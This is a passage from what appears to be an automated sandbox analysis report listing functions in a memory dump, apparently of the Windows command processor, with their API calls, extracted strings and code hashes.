                                  • Instruction Fuzzy Hash: CB31EF74944219DFDB25DB38FC0572937B0BF48725F100069E509A7AE0EB325EE0CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00164C3E, Relevance: 10.5, APIs: 7, Instructions: 42synchronizationCOMMON
                                  Download Yara Rule
                                  APIs
                                  • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,000000FF,00000000,?,?,00177929,00000000,00179313,00000000,00000000,?,00169814,00000000), ref: 00164C55
                                  • GetExitCodeProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,000000FF,?,00177929,00000000,00179313,00000000,00000000,?,00169814,00000000), ref: 00164C60
                                  • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,00177929,00000000,00179313,00000000,00000000,?,00169814,00000000), ref: 00164C7B
                                  • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00177929,00000000,00179313,00000000,00000000,?,00169814,00000000), ref: 0016EE57
                                  • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00177929,00000000,00179313,00000000,00000000,?,00169814,00000000), ref: 0016EE6D
                                  • fprintf.MSVCRT ref: 0016EE81
                                  • fflush.MSVCRT ref: 0016EE8F
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: CriticalSection$CloseCodeEnterExitHandleLeaveObjectProcessSingleWaitfflushfprintf
                                  • String ID:
                                  • API String ID: 4271573189-0
                                  • Opcode ID: 54d577b7e41b8934b30247c701e8dd271e64aadb607f0b9327a1b5d1d88db5a1
                                  • Instruction ID: 27a5a7a0505619db4c6f0de2662b188a17bfdd6cc168affdce25b93d2f9ed413
                                  • Opcode Fuzzy Hash: 54d577b7e41b8934b30247c701e8dd271e64aadb607f0b9327a1b5d1d88db5a1
                                  • Instruction Fuzzy Hash: C7014471505214FFDB10ABA8EC0DA9D7BBCFB06325F14024AF429925F1CBB60AD1C762
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00164800, Relevance: 9.3, APIs: 6, Instructions: 327COMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 00164861
                                  • memset.MSVCRT ref: 00164881
                                    • Part of subcall function 00160C70: ??_V@YAXPAX@Z.MSVCRT ref: 00160CBA
                                    • Part of subcall function 00160C70: memset.MSVCRT ref: 00160CDD
                                    • Part of subcall function 001600B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0015DF68,00000001,?,00000000,00163458,-00000105,0017BDD8,00000240,00164B82,00000000,00000000,0016AE6E,00000000), ref: 001600C1
                                    • Part of subcall function 001600B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0015DF68,00000001,?,00000000,00163458,-00000105,0017BDD8,00000240,00164B82,00000000,00000000,0016AE6E,00000000,?), ref: 001600C8
                                  • ??_V@YAXPAX@Z.MSVCRT ref: 00164991
                                  • ??_V@YAXPAX@Z.MSVCRT ref: 0016499E
                                  • longjmp.MSVCRT(0018B8B8,00000001,00007FE9,00007FE9,?,?,?,?,00000000,?), ref: 0016E94C
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: memset$Heap$AllocProcesslongjmp
                                  • String ID:
                                  • API String ID: 2656838167-0
                                  • Opcode ID: b65adbef0f23a8509db126af39b6ba42692bff79df5b22d613d31812727f67bb
                                  • Instruction ID: c9d9da738b03509568a1539e14fd53405b548fe480f846a12ba91fc5062b2423
                                  • Opcode Fuzzy Hash: b65adbef0f23a8509db126af39b6ba42692bff79df5b22d613d31812727f67bb
                                  • Instruction Fuzzy Hash: 93D1F074900224DFDB38DF58CC90BAAB7B4AF54704F0941DEE94AA7281DB30AEA1CF55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0015B6CB, Relevance: 9.2, APIs: 6, Instructions: 155COMMON
                                  Download Yara Rule
                                  APIs
                                  • _get_osfhandle.MSVCRT ref: 001699E9
                                  • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 001699F1
                                  • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000002,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 00169A30
                                  • _get_osfhandle.MSVCRT ref: 00169A49
                                  • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 00169A51
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: Console$Write_get_osfhandle$Mode
                                  • String ID:
                                  • API String ID: 1066134489-0
                                  • Opcode ID: b09d4ed54cc27d802d909fa79b95cec778037077802e8f4ad99841341d773723
                                  • Instruction ID: 067a140622f6fc629a541dabba82df980a611696d4c6ff36038b1d37ca2697ff
                                  • Opcode Fuzzy Hash: b09d4ed54cc27d802d909fa79b95cec778037077802e8f4ad99841341d773723
                                  • Instruction Fuzzy Hash: A241B031E00211DBDF24AEB8CC86AAEB3EDEB50305F14446AED06DB185EB74DD50CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0015E5A8, Relevance: 9.1, APIs: 6, Instructions: 115COMMON
                                  Download Yara Rule
                                  APIs
                                  • _tell.MSVCRT ref: 0015E5F9
                                  • _close.MSVCRT ref: 0015E62C
                                  • memset.MSVCRT ref: 0015E6CC
                                  • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00007FE7), ref: 0015E736
                                  • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00183840), ref: 0015E747
                                  • ??_V@YAXPAX@Z.MSVCRT ref: 0015E772
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: ConsoleInfoOutput_close_tellmemset
                                  • String ID:
                                  • API String ID: 1380661413-0
                                  • Opcode ID: fb5ea1811337bc148e74debd79d7cbd7368d640a7fe1c7a8710bea337e3bc716
                                  • Instruction ID: 740cda8a5a68cb8378c9628605f9af114c5fb398225b92aa54dae42d0c81814e
                                  • Opcode Fuzzy Hash: fb5ea1811337bc148e74debd79d7cbd7368d640a7fe1c7a8710bea337e3bc716
                                  • Instruction Fuzzy Hash: 1841C270904200CBDB399F28DC8872AB7E5AF84715F14052DE8659B6A1EB349ED9CB92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00162616, Relevance: 9.1, APIs: 6, Instructions: 90COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0016269C: _get_osfhandle.MSVCRT ref: 001626A7
                                    • Part of subcall function 0016269C: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0015C5F8,?,?,?), ref: 001626B6
                                    • Part of subcall function 0016269C: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0015C5C6), ref: 001626D2
                                    • Part of subcall function 0016269C: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00197F20,00000002), ref: 001626E1
                                    • Part of subcall function 0016269C: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 001626EC
                                    • Part of subcall function 0016269C: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00197F20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0015C5C6), ref: 001626F5
                                  • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00197F20,00000000,?,?,0018B980,00000002,00000000,?,00169CA6,%s %s ,?,00000000,00000000), ref: 00162667
                                  • _get_osfhandle.MSVCRT ref: 00162677
                                  • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,00169CA6,%s %s ,?,00000000,00000000), ref: 0016267F
                                  • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00197F20), ref: 00162694
                                    • Part of subcall function 001627C8: _get_osfhandle.MSVCRT ref: 001627DB
                                    • Part of subcall function 001627C8: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,0018B980,000000FF,0017D620,00002000,00000000,00000000), ref: 0016281C
                                    • Part of subcall function 001627C8: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,0017D620,-00000001,?,00000000), ref: 00162831
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
                                  • String ID:
                                  • API String ID: 4057327938-0
                                  • Opcode ID: 21890bbfac56f564f8e7ee2c1538b0339e8009a9da484c838dbff0c3b150338a
                                  • Instruction ID: b1cb6dbb63347cb17606420f75db925258be35074234d5d756b4d3b80a562b79
                                  • Opcode Fuzzy Hash: 21890bbfac56f564f8e7ee2c1538b0339e8009a9da484c838dbff0c3b150338a
                                  • Instruction Fuzzy Hash: E6210B32B007056BD7245AB9EC46B7A269CCB95751F11403EFE0ADA1C1EFA0DC504261
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0017265F, Relevance: 9.1, APIs: 6, Instructions: 82memorysynchronizationCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00172D6D: WaitForSingleObjectEx.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,000000FF,00000000,00000000,00000000,?,00171838,?), ref: 00172D7C
                                  • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?), ref: 001726CD
                                    • Part of subcall function 00172DB4: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,?,001726A5,?), ref: 00172DBD
                                    • Part of subcall function 00172DB4: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,00000000,?,001726A5,?), ref: 00172DC6
                                    • Part of subcall function 00172DB4: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,001726A5,?), ref: 00172DDF
                                  • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 001726ED
                                  • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 001726FD
                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?), ref: 00172709
                                  • RtlFreeHeap.NTDLL(00000000), ref: 00172710
                                  • ReleaseMutex.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?), ref: 00172720
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: CloseHandle$ErrorHeapLast$FreeMutexObjectProcessReleaseSingleWait
                                  • String ID:
                                  • API String ID: 2383944720-0
                                  • Opcode ID: a51b4ca5ed93fc2c4877451dd4c14a1807f04eec7007246817c1cceb72b58cc2
                                  • Instruction ID: da853494abc033f4d69fe31918d15139f0f1c6ee0b7d1df991266588a0c18e37
                                  • Opcode Fuzzy Hash: a51b4ca5ed93fc2c4877451dd4c14a1807f04eec7007246817c1cceb72b58cc2
                                  • Instruction Fuzzy Hash: C221AC30601116ABCF28AFA6D85896EB778FF64B10710C22EF80D87910DB30EC92CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00176E90, Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 80COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0015EA40: wcschr.MSVCRT ref: 0015EAB7
                                    • Part of subcall function 0015EA40: iswspace.MSVCRT ref: 0015EB2D
                                    • Part of subcall function 0015EA40: wcschr.MSVCRT ref: 0015EB49
                                    • Part of subcall function 0015EA40: wcschr.MSVCRT ref: 0015EB6D
                                  • _wcsicmp.MSVCRT ref: 00176EFC
                                  • _wcsicmp.MSVCRT ref: 00176F1B
                                  • _wcsicmp.MSVCRT ref: 00176F41
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: _wcsicmpwcschr$iswspace
                                  • String ID: KEYS$LIST$OFF
                                  • API String ID: 3924973218-4129271751
                                  • Opcode ID: 2771a30f82f8ecaab1831fe504dabc50625e179acb3f6959869335750ee82620
                                  • Instruction ID: 30f43df546a0b0c186f9afaa1f4dbc95ac0f43b6ecdd3a7a08d58c416b57df5e
                                  • Opcode Fuzzy Hash: 2771a30f82f8ecaab1831fe504dabc50625e179acb3f6959869335750ee82620
                                  • Instruction Fuzzy Hash: 58115C31208B01DAB308AB3AEC5682773B8FB95761361C01FF91B9B5C2EF615D498664
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00166CE1, Relevance: 9.1, APIs: 6, Instructions: 79memorysynchronizationCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?), ref: 001726CD
                                  • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 001726ED
                                  • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 001726FD
                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?), ref: 00172709
                                  • RtlFreeHeap.NTDLL(00000000), ref: 00172710
                                  • ReleaseMutex.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?), ref: 00172720
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: CloseHandle$Heap$FreeMutexProcessRelease
                                  • String ID:
                                  • API String ID: 1689195821-0
                                  • Opcode ID: 037c8242690fd86028dae713bb365e37bdddf120058647f6ad8f9010ab08d3e9
                                  • Instruction ID: b36fef6c98986b467350258122af33fad9f6e8627bf8c5e86101a009397c8220
                                  • Opcode Fuzzy Hash: 037c8242690fd86028dae713bb365e37bdddf120058647f6ad8f9010ab08d3e9
                                  • Instruction Fuzzy Hash: A4218E70601106ABDF28AF66D858E6EB779FF64B00710C12EF84D86914DB30EC93CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00160178, Relevance: 9.1, APIs: 6, Instructions: 62COMMON
                                  Download Yara Rule
                                  APIs
                                  • _get_osfhandle.MSVCRT ref: 00160183
                                  • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0016D6A1), ref: 0016018D
                                  • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 001601B8
                                  • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00197F20,00000001), ref: 001601C7
                                  • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 001601D2
                                  • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00197F20), ref: 001601DB
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                  • String ID:
                                  • API String ID: 513048808-0
                                  • Opcode ID: c0b530be7cd5a0d77f3f178413dc115d1db5e9e2eaaa7b3351bff31085e6a2fa
                                  • Instruction ID: dc5a3017a7227c29bc2865ba460c03e46775b040c3d94f48a354bfc6fe906336
                                  • Opcode Fuzzy Hash: c0b530be7cd5a0d77f3f178413dc115d1db5e9e2eaaa7b3351bff31085e6a2fa
                                  • Instruction Fuzzy Hash: 6111A073804255ABE712977C9D0CB7B37ECEB4A325F25032AEC66D28A0D7748D95C251
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0016269C, Relevance: 9.1, APIs: 6, Instructions: 54COMMON
                                  Download Yara Rule
                                  APIs
                                  • _get_osfhandle.MSVCRT ref: 001626A7
                                  • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0015C5F8,?,?,?), ref: 001626B6
                                  • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0015C5C6), ref: 001626D2
                                  • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00197F20,00000002), ref: 001626E1
                                  • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 001626EC
                                  • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00197F20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0015C5C6), ref: 001626F5
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                  • String ID:
                                  • API String ID: 513048808-0
                                  • Opcode ID: 0cb1bc7cb78106972948dd6e4a19a92ba32993642e6abb22c2c191aea0e69e48
                                  • Instruction ID: 9050a91f311cbfaac81f795a0a8e0025c5b46d60f3ca0e23503a9fd1fa5e6c3b
                                  • Opcode Fuzzy Hash: 0cb1bc7cb78106972948dd6e4a19a92ba32993642e6abb22c2c191aea0e69e48
                                  • Instruction Fuzzy Hash: 2B012673814921AB9B20177C9C4CC7E36ACE7563317350326FC35E28E0DB348DA582A0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0015FE10, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 219COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 001600B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0015DF68,00000001,?,00000000,00163458,-00000105,0017BDD8,00000240,00164B82,00000000,00000000,0016AE6E,00000000), ref: 001600C1
                                    • Part of subcall function 001600B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0015DF68,00000001,?,00000000,00163458,-00000105,0017BDD8,00000240,00164B82,00000000,00000000,0016AE6E,00000000,?), ref: 001600C8
                                  • memset.MSVCRT ref: 0016C954
                                  • longjmp.MSVCRT(0018B8F8,000000FF,00000000,00183892,00183890,?,?,?,?,0015FD5C,?,?,?,0016837D,00000000), ref: 0016C96D
                                  • memcpy.MSVCRT ref: 0016C987
                                  • longjmp.MSVCRT(0018B8F8,000000FF,00183892,00183890,?,?,?,?,0015FD5C,?,?,?,0016837D,00000000), ref: 0016C9D3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: Heaplongjmp$AllocProcessmemcpymemset
                                  • String ID: 0123456789
                                  • API String ID: 2034586978-2793719750
                                  • Opcode ID: 22529cadada2ca92464248b1d975cb1e718a5b17ec836ee77fb004f66370b1a4
                                  • Instruction ID: 161098e276fc36751e8f84b7c044785008de7b036359e57e583ad14d46e5c76e
                                  • Opcode Fuzzy Hash: 22529cadada2ca92464248b1d975cb1e718a5b17ec836ee77fb004f66370b1a4
                                  • Instruction Fuzzy Hash: 43713335A00202DBDB249F68CD8677A73A5EF85301F19407DEC65AF791EB309E8AC780
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00166390, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 183COMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 001663D6
                                    • Part of subcall function 00160C70: ??_V@YAXPAX@Z.MSVCRT ref: 00160CBA
                                    • Part of subcall function 00160C70: memset.MSVCRT ref: 00160CDD
                                    • Part of subcall function 0015EA40: wcschr.MSVCRT ref: 0015EAB7
                                    • Part of subcall function 0015EA40: iswspace.MSVCRT ref: 0015EB2D
                                    • Part of subcall function 0015EA40: wcschr.MSVCRT ref: 0015EB49
                                    • Part of subcall function 0015EA40: wcschr.MSVCRT ref: 0015EB6D
                                  • ??_V@YAXPAX@Z.MSVCRT ref: 001664BF
                                  • iswspace.MSVCRT ref: 0016F751
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: wcschr$iswspacememset
                                  • String ID: %s
                                  • API String ID: 2220997661-3043279178
                                  • Opcode ID: a248df55aa68c3ce41a8e4ac43f99edf7c070ee11f50a9fd2c3915533a71bd71
                                  • Instruction ID: d49d92fed075584aec04c80f8c3495b8b8e563513eaadbda4a93fac448fbfe5c
                                  • Opcode Fuzzy Hash: a248df55aa68c3ce41a8e4ac43f99edf7c070ee11f50a9fd2c3915533a71bd71
                                  • Instruction Fuzzy Hash: 56510676A001159BCB24DF68EC816BAB7F5FF58350F18416EE846E7340EB319EA2C790
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001785E9, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 174COMMON
                                  Download Yara Rule
                                  APIs
                                  • longjmp.MSVCRT(0018B8F8,00000001,00000000,00178DAB,?,?,?,?,00000000,?,00000021,00000000,?,?,?,00000000), ref: 0017865D
                                  • memset.MSVCRT ref: 001786B6
                                  • memset.MSVCRT ref: 001786E4
                                  • memset.MSVCRT ref: 00178712
                                    • Part of subcall function 0015CD27: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00179362,00000000,00000000,?,00169814,00000000), ref: 0015CD55
                                    • Part of subcall function 00160C70: ??_V@YAXPAX@Z.MSVCRT ref: 00160CBA
                                    • Part of subcall function 00160C70: memset.MSVCRT ref: 00160CDD
                                    • Part of subcall function 0015585F: VirtualAlloc.API-MS-WIN-CORE-MEMORY-L1-1-0(00000000,0000FE00,00001000,00000004,00000000,?,00000001,?,001787AD,?,00000000,-00000105,-00000105,-00000105), ref: 00155875
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: memset$AllocCloseFindVirtuallongjmp
                                  • String ID: %9d
                                  • API String ID: 973120493-2241623522
                                  • Opcode ID: 54534158ea9a40dc90c8514fac1768a9c7bb52c595da28dc7de9322d43937470
                                  • Instruction ID: 6d94afcae02433e6ee143255f1c34d0883965ee140a1bb1a76193bf898d3b1d9
                                  • Opcode Fuzzy Hash: 54534158ea9a40dc90c8514fac1768a9c7bb52c595da28dc7de9322d43937470
                                  • Instruction Fuzzy Hash: 2651C0B19083809BD324DB65CC85AAB7BF9AB94314F000A2EF59DD7281EF74D944CB56
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00174588, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 110COMMON
                                  Download Yara Rule
                                  APIs
                                  • _wcsnicmp.MSVCRT ref: 00174635
                                    • Part of subcall function 00167721: __iob_func.MSVCRT ref: 00167726
                                  • fprintf.MSVCRT ref: 001745B5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: __iob_func_wcsnicmpfprintf
                                  • String ID: CMD Internal Error %s$%s$Null environment
                                  • API String ID: 1828771275-2781220306
                                  • Opcode ID: 9d388d6cef03252d6662f7fb059fd58d645292ffc333e68e0691a57a6f219f32
                                  • Instruction ID: a637861bfedd3c25d92a23d7172b2abcfabf77a090ae2712731c0f28eb7e69bb
                                  • Opcode Fuzzy Hash: 9d388d6cef03252d6662f7fb059fd58d645292ffc333e68e0691a57a6f219f32
                                  • Instruction Fuzzy Hash: 95314936E00211DBCB38EF689C465AEB3B0EF54700F15856DFC2EA7680EB705E558684
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001568D9, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 75COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0015DEF9: iswspace.MSVCRT ref: 0015DF07
                                    • Part of subcall function 0015DEF9: wcschr.MSVCRT ref: 0015DF18
                                  • wcschr.MSVCRT ref: 00156914
                                  • wcschr.MSVCRT ref: 00156926
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: wcschr$iswspace
                                  • String ID: &<|>$+: $=,;
                                  • API String ID: 3458554142-2256444845
                                  • Opcode ID: 5d92fa41fd61d03af80aaac6ad17b164298f765b21e24dc44fbeaedec75aa800
                                  • Instruction ID: b7bba394c0bb723f0d40c3d3acad3467e18f5d1a1230b9a71e33db7ba904bc4b
                                  • Opcode Fuzzy Hash: 5d92fa41fd61d03af80aaac6ad17b164298f765b21e24dc44fbeaedec75aa800
                                  • Instruction Fuzzy Hash: 42212762A04265EEC7348B26D8455BEB7E5EFB532BB65005AEDE4DF280FB314C48D390
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00154476, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,02000000,?), ref: 0015449A
                                  • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,UBR,00000000,?,?,?), ref: 001544BE
                                  • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 001544C9
                                  Strings
                                  • Software\Microsoft\Windows NT\CurrentVersion, xrefs: 00154490
                                  • UBR, xrefs: 001544B6
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: CloseOpenQueryValue
                                  • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                  • API String ID: 3677997916-3870813718
                                  • Opcode ID: 4e1b0d9f87178ec24a12e1ab20fce7dde0b31f1509dc3de0ea4fcc13914e6b23
                                  • Instruction ID: 4a7c24a22fa969c3f31d0b1e17b4a5bd589ec6b9d2eac0e8aa1aa62fbd454e73
                                  • Opcode Fuzzy Hash: 4e1b0d9f87178ec24a12e1ab20fce7dde0b31f1509dc3de0ea4fcc13914e6b23
